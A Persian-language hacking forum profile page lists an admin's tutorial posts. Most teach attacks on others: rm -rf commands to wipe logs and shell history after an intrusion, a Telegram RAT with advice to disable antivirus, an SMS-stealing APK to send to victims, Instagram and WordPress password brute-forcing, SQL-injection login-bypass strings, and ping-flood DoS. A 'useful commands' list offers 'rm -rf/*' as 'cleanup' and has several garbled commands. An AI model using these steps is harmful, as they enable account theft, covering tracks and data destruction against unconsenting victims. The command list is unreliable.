رفتن به مطلب

flocky

مدیر
  • تعداد ارسال ها

    22
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    3

آخرین بار برد flocky در 26 شهریور

flocky یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

31 Excellent

2 دنبال کننده

درباره flocky

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. flocky

    پاک کردن صحنه جرم در کالی لینوکس!

    سلام و ارض ادب خدمت کاربران انجمن تیم امنیتی جغد شاید شده که بعد از انجام عملیات هک نگران این باشید که رد پای شما رو پیدا کنن خب اصلا جای نگرانی نیست ما در این پست 10 دستور رو بهتون یاد میدیم که هیچ رد پایی از خودتون به جا نزارید و صحنه جرم رو پاک کنید 🙂 rm -rf /var/logs rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /tmp/logs rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /etc/utmp با سپاس از این که همراه ما هستید
  2. flocky

    ساخت پسورد لیست با کالی لینوکس

    سلام و ارض ادب خدمت کاربران تیم امنیتی جغد امروز قصد داریم تا بهتون یاد بدیم چطوری با ابزار کرانچ پسورد لیست بسازید و این که پسورد لیست های مختلفی بر اساس مناطق مختلف یا به زیان های گوناگون وجود داره مثلا پسورد لیست انگلیسی و فرانسوی و.. تفاوت این پسورد ها تو اسمشونه مثلا نام و نام خانوادگی مردم امریکا با اسیا فرق میکنه یا مثلا چیزایی که اونا علاقه دارن با اینا فرق میکنه خب بریم سراغ آموزش ابتدا ابزار crunch رو نصب میکنیم: sudo apt-get install crunch ترمینال رو باز میکنیم و این دستورات رو وارد میکنیم: crunch 1 5 -o /Desktop/pass.txt این عدد یک تا پنج بالا نشان دهنده اینه که کلمات ما یک تا پنج حرف باید باشه یعنی خودمون تایین میکنیم چقدر باشه و -o هم اینجا کار سیو کردن کلمات داخل یه فایل خروجی که اخر دستور گزاشتیم رو بر عهده داره و دستور بعدی که میخوام بهتون بگم: crunch 1 5 abcd -o /Desktop/pass.txt تو دستور بالا با دستور کرانچ میگیم که طول حروفمون از یک تا پنج حرف باشه ولی از حروف دلخواه ما برای ساختش استفاده بشه یعنی همون حروف abcd که نوشته شده همینطور شما هم میتونین این روش رو امتحان کنید و خودتونون به چالش بکشید این آموزش فعلا درحد مبتدی هست و پیشرفته رو هم به زودی میگزاریم... با سپاس از این که همراه ما هستید
  3. flocky

    nmap در اندروید!

    سلام و ارض ادب خدمت کاربران انجمن تیم امنیتی جغد در این پست قصد داریم بهتون یاد بدیم که چطوری nmap رو روی ترموکس نصب کنید و باهاش اسکن کنید دستور زیر را جهت نصب وارد میکنیم: (هرجا [n/y] اورد y رو بزنید) yum install nmap خب به همین راحتی نصب شد حالا میریم سراغ لیست دستور ها: 1_اسکن سریع یک سیستم: nmap -F 192.168.1.1 2_اسکن سریع همراه با ارائه جزئیات و نسخه پورت‌ها: nmap -v 192.168.1.1 3_شناسایی سیستم عامل به همراه اسکن با جزئیات: nmap -v -A 192.168.1.1 4_اسکن کامل با بازه دلخواه شماره پورت‌ها: (در دستور زیر تنها پورت های بازه 1 تا 100 اسکن شده و گزارش داده می شود.) nmap -v -p 1-100 192.168.1.1 5_اسکن با پکت‌های تصادفی برای اینکه از بلاک شدن در فایروال سیستم مورد نظر جلوگیری بشه: nmap -v -f 6_ارسال پکت به صورت ناشناس: nmap -v 192.168.1.1 -g 80 (برای این ناشناس هست که در nmap تمام پکت‌ها رو از طریق پورت 80 شما ارسال میکنه و سیستم تارگت اون رو به عنوان یک درخواست وب نگاه میکنه) 7_اسکن یک سیستم در مواقعی که سیستم مقصد ping رو بلاک کرده باشه: nmap -v -Pn نمونه ای از دستور کامل: nmap -v -A -Pn -f -p 1-65535 192.168.1.1 -g 80 توضیح: پکت از سیستم شما با پورت 80 ارسال میشه و تمامی پورت های سیستم مقصد بررسی شده و به همراه مشخصات سیستم عامل نمایش داده میشه و نرم افزار nmap کاری با بسته شدن پروتکل ICMP سیستم مقصد نداره و پکت هارو تصادفی ارسال میکنه با سپاس از این که همراه ما هستید
  4. flocky

    هک WIFI با cmd

    سلام و ارض ادب خدمت کاربران انجمن تیم امنیتی جغد در این پست قصد داریم که بهتون یاد بدیم چطوری با cmd وای فای رو هک کنید (برای اینکار باید کامپیوتر یا لپ تاپتون دارای دانگل وای فای باشه) وارد cmd میشیم و مراحل زیر رو انجام میدیم: ابتدا دستور wmic رو تایپ میکنیم و enter میزنیم حالا دستور guit رو تایپ میکنیم و enter رو میزنیم 3.سپس دستورnetsh wlan show profiles رو تایپ میکنیم وenter میکنیم خب الان لیستی از وای فای هایی که موجود هستن برامون نمایش داده میشه و فرض میکنیم اسم وای فایی که میخوایم هک کنیم arash باشه دستور netsh wlan show profiles arash رو تایپ میکنیم و enter میزنیم دستور netsh wlan show profiles milad key=clear رو وارد میکنیم و enter میزنیم حالا اگه قسمت key content رو یه نگاهی بندازیم رمز رو مشاهده میکنیم با سپاس از این که همراه ما هستید انجمن امنیتی جغد | owlsec.ir T.me://owlsecurityteam
  5. flocky

    هک کامپیوتر با رات

    سلام و ارض ادب خدمت کاربران انجمن تیم امنیتی جغد قصد داریم تو این پست به شما یاد بدیم که چطوری رات کامپیوتر بسازید و نکته جالبش اینجا هست که میتونید از طریق ربات تلگرام کامپیوتر رو کنترل کنید. ابتدا وارد ترمینال میشیم و به این صورت پایتون رو نصب میکنیم: python -m easy_install pypiwin32 و با دستور زیر ابزار رو دریافت و نصب میکنیم: git clone [Hidden Content] && cd BlackDante && python main.py فایل telegram.service رو با نوت پد باز میکنیم و در لاین 15 توکن خودمون رو وارد میکنیم( YOUR_BOT_TOKEN رو پاک کنید و بجاش توکن رباتتون رو بزارید) و در آخر دستور زیر رو وارد میکنیم: python telegram.service بهتره که آنتی ویروس، ویندوز دیفندر، و فایروال خاموش باشن با سپاس از این که همراه ما هستید
  6. flocky

    دیداس با cmd

    سلام و ارض ادب خدمت کاربران انجمن تیم امنیتی جغد در این پست قصد داریم آموزش دیداس با استفاده از cmd رو بهتون آموزش بدیم ابتدا cmd رو باز میکنیم و دستور زیر رو وارد میکنیم و پینگ سایت رو میگیریم: ping site.com (به جای site سایت مورد نظر رو بنویسید) ping 127.0.0.1 -t -l 65500 در دستور بالا بعد از l- باید تعداد پکت رو بنویسیم بنده 65500 نوشتم چون ip لوکال به سرعت اینترنت مربوط نمیشه اما شما با توجه به سرعت اینترنت باید پاکت بین 1000 تا 20000 بزارید که من 1500 پیشنهاد میکنم کلا از سرور مجازی استفاده کنید واسه دیداس، و اینکه اگه میخواید دیداستون الکی و بی نتیجه نمونه این حملات رو به صورت گروهی انجام بدید یا اگه بودجه کافی دارید روی چنتا سرور مجازی دیداس رو شروع کنید. با سپاس از اینکه همراه ما هستید.
  7. flocky

    کرک اینستاگرام در اندروید

    سلام و ارض ادب خدمت کاربران انجمن تیم امنیتی جغد شاید شما جزء افرادی باشید که میخواین اینستاگرام رو کرک کنید ولی کامپیوتر ندارید یا میخواید یه تنوعی بشه و با اندروید اکانت های اینستاگرام رو کرک کنید خب پس در این پست یاد میگیریم که چطوری با اندروید اینستاگرام رو کرک کنیم نرم افزار termux رو دانلود میکنیم اوارد برنامه ترموکس میشیم و با دستورات زیر ابزار هارو آپدیت میکنیم(وقتی جایی [n/y] اومد شما y رو بزنید) apt update apt upgrade ابزار های مورد نیاز رو با دستورات زیر نصب میکنیم: pkg install git pkg install python pip install requests pip install wordlist با دستور زیر ابزار کرک اینستاگرام رو دانلود میکنیم git clone [Hidden Content] وارد پوشه اینستا هک میشیم: cd instahack ls رو میزنیم باید فایل pass.txt رو حذف کنیم و یه پسورد لیست جدید بسازیم برای حذف فایل از دستور زیر استفاده میکنیم: rm -f pass.txt با دستور زیر یه پسورد لیست میسازیم wordlist -m 4 -M 6 -o pass.txt -v 123456 دستورات زیر رو میزنیم: python hackinsta.py یوزر اینستاگرام رو میزنیم سپس n و بعدش 1 حالا فقط کافیه صبر کنیم تا کرک بشه با سپاس از اینکه با ما همراه هستید.
  8. flocky

    رات sms

    سلام و درود خدمت کاربران انجمن تیم امنیتی جغد . امروز قصد داریم تروجان یا همون رات رو براتون معرفی کنیم که باهاش میتونید به واتساپ تلگرام اینستاگرام(درصورتی که رمز رو دارید و نیاز به تایید دو مرحله ای هست در اکانت تارگت) و... نفوذ کنید. ابتدا رات رو در پایین پست دانلود کنید حالا باید رات رو ادیت کنیم که باید از نرم افزار Apk Editor Pro استفاده کنیم خب وارد ادیتور میشیم و فایل رات رو انتخاب میکنیم و گزینه فول ادیت رو میزنیم بعدش هم گزینه اولی رو میزنیم روی سربرگ files میزنیم و گزینه smali بالای صفحه رو میزنیم حالا روی آیکون ذربین میزنیم و YOURPHONE رو سرچ میکنیم روی آیکون مداد(ویرایش) میزنیم و کلمه YOURPHONE رو ویرایش میکنیم به شماره خودمون آیکون سیو رو بزنید و در آخر Build رو بزنید تا فایل ذخیره بشه فایل رات شما تو مسیر حافظه دستگاه پوشه apk editor ذخیره شده و کافیه برای قربانی بفرستید شماره قربانی و اسمس ها براتون ارسال میشه و میتونید نقشه های شوم خودتون رو پیاده کنید 🙂 دانلود فایل
  9. flocky

    دستورات کاربردی لینوکس

    سلام و ارض ادب خدمت کاربران انجمن تیم امنیتی جغد. تو این پست قصد داریم که پرکاربردی ترین دستورات لینوکس رو بهتون معرفی کنیم نمایش ip: ifconfig پاکسازی: rm -rf/* نمایش پردازش ها: top زمان فعال بودن سیستم و کاربران: up نمایش اطلاعات cpu: cat/proc/cpuinfo نمایش اطلاعات Ram cat/proc/meminfo حذف فایل: rm -rf "file name" ساخت دایرکتوری: mkdir "folder name" وارد شدن به دایرکتوری: cd "directory name" بازگشت به دایرکتوری قبلی: cd .. بازگشت به دایرکتوری اصلی: cd -e $HOME کپی کردن فایل بین دایرکتوری: cp "name" جابه جایی فایل بین دایرکتوری: mv "name" لیست فایل ها و ابزار های موجود در دایرکتوری: ls جستجوی فایل در دایرکتوری ها: find "name" حذف دایرکتوری: rmdir "directory name" ویرایش فایل در سرور: nano "file name" اجازه دسترسی کامل به فایل و اجرایی کردن: chmod +x "file name" chmod 777 "file name" لیست فایل و دایرکتوری به همراه سایز ls -l بستن تمام پروسه های روت: pkill -KILL -u root ایجاد فایل txt: vi "name.txt" ری استارت مجدد: shutdown -r now استخراج فایل های زیپ: unzip "zip file" نمایش مسیر دایرکتوری: pwd پاکسازی ترمینال: clear تاریخچه ای از دستورات استفاده شده: history ریبوت کردن سرور: reboot ساختن یوزر: sudo adduser "name" ارتقا یوزر به سودو: sudo adduser "name" sudo حذف یوزر: sudo deluser "name" حذف دسترسی یوزر به سودو: sudo deluser "name" sudo مدیریت پسوردهای روت و یوزر: psswd "user" اجرای خودکار پس از خروج از سرور: screen نصب پکیج بروی سرور: get-apt install "package name" حذف یک پکیج از سرور: get-apt remove "package name" تغییر پورت سرور: sshd_config دانلود از گیت هاب: git clone "address url.git" دانلود از لینک: wget "address url" با سپاس از اینکه با ما همراه هستید.
  10. flocky

    دور زدن(بایپس) پنل لاگین ادمین

    سلام و درود خدمت کاربران انجمن تیم امنیتی جغد در این پست قصد داریم به شما مجموعه ای از دستورات رو معرفی کنیم که اگه اونارو وارد پنل لاگین کنید، پنل بایپس میشه و بدون داشتن یوزر و پسورد میتونید وارد پنل بشید: (دقت کنید هر دستور رو هم در فیلد پسورد و هم در فیلد یوزر وارد کنید) ' or ''=' ') or true— ') or ('')=(' ') or 1— ') or ('x')=(' " or true— " or ""=" " or 1— " or "x"=" ") or true— ") or ("")=(" ") or 1— ") or ("x")=(" ')) or true— ')) or ((''))=((' ')) or 1— ')) or (('x'))=((' (بیشتر رو سایت های باگ sql کار میکنه) با سپاس از از این که با ما همراه هستید.
  11. flocky

    پسورد لیست هندی

    سلام و درود خدمت کاربران انجمن تیم امنیتی جغد . شما در این فایل یک پسورد لیست هندی رو دریافت میکنید که بیش از 10K پسورد داخلش هست، هم برای کرک سرور خوبه و هم کرک اکانت های گیمینگ دانلود فایل
  12. flocky

     اسکنر Dmitry در کالی لینوکس

    سلام و درود خدمت کاربران انجمن تیم امنیتی جغد (این اسکنر برای افراد مبتدی هست) در این آموزش شما رو با ابزار dmitry ابزار برای انالیز کردن سایت مثل whois sub domin port scaner و... آشنا میکنم. ابتدا dmitry رو باز میکنیم اولین مرحله برا whois گرفتن از سایت از پارامتر w- dmitry -w www.site.com دومین مرحله پیدا کردن sub domin پارامتر s- dmitry -s www.site.com سومین مرحله port scaner از پارامتر p- dmitry -p www.site.com بجای site تارگت خودتونو بزارید با سپاس از این که همراه ما هستید
  13. flocky

    برسی امنیت وایرلس

    سلام و درود خدمت کاربران انجمن تیم امنیتی جغد در این پست قصد داریم نحوه برسی امنیت وایرلس رو بهتون یاد بدیم دستور aircrack-ng با استفاده از برنامه Aircrack-ng میتونید زمانیکه به اندازه کافی Packet های شبکه وایرلس رو Capture کردید کلیدهای مورد نیاز شبکه 802.11 WEP و یا WPA-PSK را بدست بیارید. Aircrack-ng از حمله استاندارد FMS به همراه بعضی از حملات بهینه شده مثل Korek استفاده میکنه. نحوه استفاده از دستور aircrack-ng به شکل زیر هست: root@kali:~# aircrack-ng -w /usr/share/wordlists/nmap.lst capture-01.cap دستور asleap با استفاده از دستور asleap میتونید ضعف های شبکه اختصاصی LEAP سیسکو رو پیدا کنید. از اونجایی که LEAP از پروتکل MS-CHAPv2 برای تبادلات احراز هویت استفاده میکنه به حملات دیکشنری آفلاین حساس هست. از بقیه ویژگیهای برنامه asleap حمله به پروتکل PPTP و هر نوع تبادلات MS-CHAPV2 هست. نحوه استفاده از دستور asleap به صورت زیره: root@kali:~# asleap -r leap.dump -f asleap.dat -n asleap.idx -s دستور bluelog Bluelog یک اسکنر Bluetooth هست که دارای ویژگی Daemon Mode دلخواهه Bluelog مخصوص بررسی و مانیتور کردن ترافیک سایت ها طراحی شده. این برنامه برای ثابت باقی ماندن در یک مکان طراحی شده تا کلیه دستگاه های Bluetooth رو در اون مکان پیدا کنه. نحوه استفاده از دستور bluelog به شکل زیره: root@kali:~# bluelog دستور bluemaho برای بررسی امنیت دستگاه های Bluetooth میتونید از مجموعه ابزارهای BlueMaho استفاده کنید. BlueMaho یک برنامه رایگان و Open Source هست که با Python نوشته شده و میتونه دستگاه های Bluetooth را برای شناسایی آسیب پذیری های شناخته شده بررسی کنه. نحوه استفاده از دستور bluemaho به شکل زیره: root@kali:~# bluemaho.py دستور blueranger BlueRanger یک اسکریپت Bash سادست که کار اون ارسال پینگ l2cap برای ساخت ارتباط بین رابط های Bluetooth هست. از اینرو خیلی از دستگاه ها بدون اجازه و احراز هویت این Ping ها را قبول میکنن. و در تئوری هرچی کیفیت لینک ها بیشتر باشه دستگاه های Bluetooth نزدیک تر هستن. نحوه نوشتن دستور blueranger به شکل زیره: root@kali:~# blueranger.sh hci1 20:C9:D0:43:4B:D8 دستور bluesnarfer bluesnarfer یک ابزار در زمینه دسترسی غیر مجاز به اطلاعات دستگاه های وایرلسه که از ارتباط Bluetooth استفاده میکنه نحوه استفاده از دستور bluesnarfer به شکل زیره: root@kali:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i دستور bully Bully یک راهکار جدید برای حمله Brute Force به WPS هست. به طور مفهومی Bully مثل باقی برنامه هاست چراکه از مشکلات طراحی WPS بهره برداری میکنه. این برنامه چندین برتری نسبت به Reaver Code اصلی داره که از جمله آنها وابستگی کمتر و استفاده بهینه تر از توانایی CPU و Memory هست. نحوه استفاده از دستور bully به شکل زیره : root@kali:~# bully -e 6F36E6 mon0 دستور cowpatty با استفاده از ابزار cowpatty میتونید یک Dictionary Attack آفلاین در برابر شبکه WPA/WPA2 که مبنی بر احراز هویت WPA Personal هست رو پیاده سازی کنید. نحوه استفاده از دستور cowpatty به صورت زیره: root@kali:~# cowpatty -d cowpatty_dict -r Kismet-20140515-16-21-37-1.pcapdump -s 6F36E6 با سپاس از اینکه با ما همراه هستید.
  14. flocky

    هک سایت وردپرسی!

    سلام و ارض ادب خدمت تمامی کاربران تیم امنیتی جغد. تو این پست قصد داریم به شما یاد بدیم که چطوری صفحه لاگین ادمین رو کرک کنید ابتدا باید User سایت رو در بیاریم که با این دستور یوزر های سایت رو میتونیم بدست بیاریم : wpscan --url target.com --enumerate u که به جای target.com هم ادرس وبسایت تارگت رو مینویسیم و بعد بدست اوردن یوزر هم باید لیست پسورد رو بدیم مثلا اگر یوزر administrator بود به این شکل میشه : wpscan --url target.com --wordlist pass.txt --username administrator با سپاس از این که با ما همراه هستید.
×
×
  • اضافه کردن...